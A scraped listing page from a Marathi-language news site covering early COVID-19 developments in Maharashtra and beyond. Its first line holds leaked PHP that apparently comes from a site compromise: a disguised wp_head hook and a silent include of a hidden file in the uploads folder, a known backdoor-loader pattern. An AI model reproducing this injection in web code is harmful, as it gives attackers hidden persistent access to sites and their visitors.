add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

पुण्यातील एका प्रसिद्ध हॉटेलमध्ये उतरलेल्या परदेशी पाहुण्यांना करोनाची लागण झाल्याची अफवा सोशल मीडियावरून पसरविल्या प्रकरणी एकाविरोधात कोरेगाव पार्क पोलीस ठाण्यात गुन्हा दाखल करण्यात आला आहे. करोनाची अफवा पसरविल्याबद्दल दाखल करण्यात आलेला हा पुण्यातील आणि राज्यातील पहिला गुन्हा आहे. पुण्याचे विभागीय आयुक्त डॉ. दीपक म्हैसेकर यांनी कालच पत्रकार परिषद घेऊन...

Read More

राज्यात करोनाबाधित रुग्णांची संख्या ३२ वर पोहोचली आहे. संसर्गजन्य आजार असलेल्या करोनाला प्रतिबंध घालण्यासाठी राज्य सरकारनं कठोर पावलं उचलण्यास सुरूवात केली आहे. याचा भाग म्हणून गर्दी होणारी ठिकाणं बंद करण्याचे आदेश देण्यात आले आहेत. याचंच पुढचं पाऊल म्हणजे सरकार करोनाचा संसर्ग रोखण्यासाठी करोनाबाधित रुण्गांनं विलगीकरणास सहकार्य केलं नाही, तर...

Read More

मुंबई महापालिकेच्या विविध विभागात काम करणाऱ्या ज्या कर्मचाऱ्यांना गणवेश आहे अशा कर्मचाऱ्यांनी कामावर येताना आपला गणवेश घातला नाही तसेच ओळखपत्र गळ्यात घातले नाही, तर यापुढे त्यांचा पगार कापण्यात येणार आहे. तसेच गणवेश न घालता आलेल्या कर्मचाऱ्याला विनावेतन रजेबाबतचा ज्ञाप देण्यात येणार आहे. पालिकेच्या सामान्य प्रशासन विभागाने तसे परिपत्रक काढले...

Read More

औरंगाबादमध्ये आणखी एक महिला करोनाग्रस्त झाल्याचे समोर आलं आहे. त्यामुळे राज्यातल्या करोनाग्रस्तांची संख्या ३१ वरुन ३२ वर गेली आहे. शनिवारच्या दिवशी राज्यभरात १२ करोनाग्रस्त रुग्ण आढळले आहेत. त्यामुळे शनिवारी राज्यातील करोनाग्रस्तांची संख्या ३१ वर पोहचली होती. आता यामध्ये आणखी एका रुग्णाची भर पडल्याने ही संख्या ३२ वर पोहचली आहे....

Read More

अमेरिकेचे राष्ट्राध्यक्ष डोनाल्ड ट्रम्प यांनी करोना टेस्ट केली. या चाचणीत त्यांचा रिपोर्ट निगेटीव्ह आला आहे. या रिपोर्टनुसार ट्रम्प यांची प्रकृती ठणठणीत आहे. ब्राझिलच्या राष्ट्रपतींच्या प्रेस सेक्रेटरींना भेटल्यानंतर डोनाल्ड ट्रम्प यांनी करोनाची टेस्ट करावी अशी चर्चा होत होती. ज्यानंतर डोनाल्ड ट्रम्प यांनी करोना टेस्ट केली मात्र ती निगेटीव्ह आली आहे....

Read More

राज्यभरात वेगाने फैलावत असलेल्या कोरोना व्हायरसचा (Coronavirus) प्रादुर्भाव रोखण्यासाठी मुंबईत ३१ मार्चपर्यंत जमावबंदीचे आदेश (कलम १४४) लागू करण्यात आले आहेत. त्यामुळे आता सार्वजनिक ठिकाणी लोकांना मोठ्या संख्येने एकत्र येता येणार नाही. तसेच १५ मार्चपासून सर्वप्रकारच्या पर्यटन आणि बिझनेस टूर बंद करण्यात आल्या आहेत. हे आदेश न पाळणाऱ्यांवर पोलिसांकडून कारवाई...

Read More

ईरानी राष्ट्रपति हसन रुहानी ने शुक्रवार को प्रधानमंत्री नरेंद्र मोदी सहित कई वैश्विक नेताओं को पत्र लिखा, जिसमें COVID-19 से लड़ने के प्रयासों को अमेरिकी प्रतिबंधों से प्रभावित होने की बात कही गई है. राष्ट्रपति हसन रुहानी ने अपने पत्र में जोर देकर कहा कि कोरोनो वायरस के खिलाफ...

Read More

राज्यात सर्वाधिक करोनाचे रुग्ण पुण्यात आढळल्याने पुणेकरांची झोप उडाली आहे. करोनाचा अधिक फैलाव होऊ नये म्हणून पुणे प्रशासनाने कठोर पावले उचलली असून शहरातील २०२ उद्याने अनिश्चित काळासाठी बंद करण्यात आली आहे. त्यामुळे पुणेकरांच्या मॉर्निंग वॉकला ब्रेक बसला आहे. तर अनेक पुणेकरांनी स्वत:हून घराबाहेर पडणं टाळल्याने रस्त्यांवर शुकशुकाट निर्माण झाला...

Read More

करोनाच्या पार्श्वभूमीवर राज्य सरकारने मोठा निर्णय घेतला आहे. खबरदारीचा उपाय म्हणून राज्यातील सर्व शाळांना ३१ मार्च पर्यंत सुट्टी जाहीर करण्यात आली आहे. महापालिका, नगरपालिका, नगरपंचायत हद्दीतील शाळा बंद राहणार असल्याचा निर्णय राज्य सरकारने जाहीर केला आहे. ग्रामीण भागांमधील शाळा बंद होणार नाहीत. अंगणवाड्याही बंद राहणार असल्याचं सरकारने म्हटलं आहे....

Read More

करोना विषाणूला रोखण्यासाठी युद्धपातळीवर प्रयत्नशील असणाऱ्या केंद्र सरकारने आज मोठी घोषणा केली. करोना विषाणूची लागण झाल्याने रुग्णाचा मृत्यू झाल्यास त्याच्या कुटुंबीयांना ४ लाख रुपयांची मदत देण्याचे पाऊल आज केंद्र सरकारने उचलले आहे. या बरोबरच करोना रुग्णांसाठी काम करणाऱ्या तसेच करोनाविरोधी मोहिमेत सहभागी असलेल्यांनाही ही मदत दिली जाणार असल्याचे गृहमंत्रालयाने...

Read More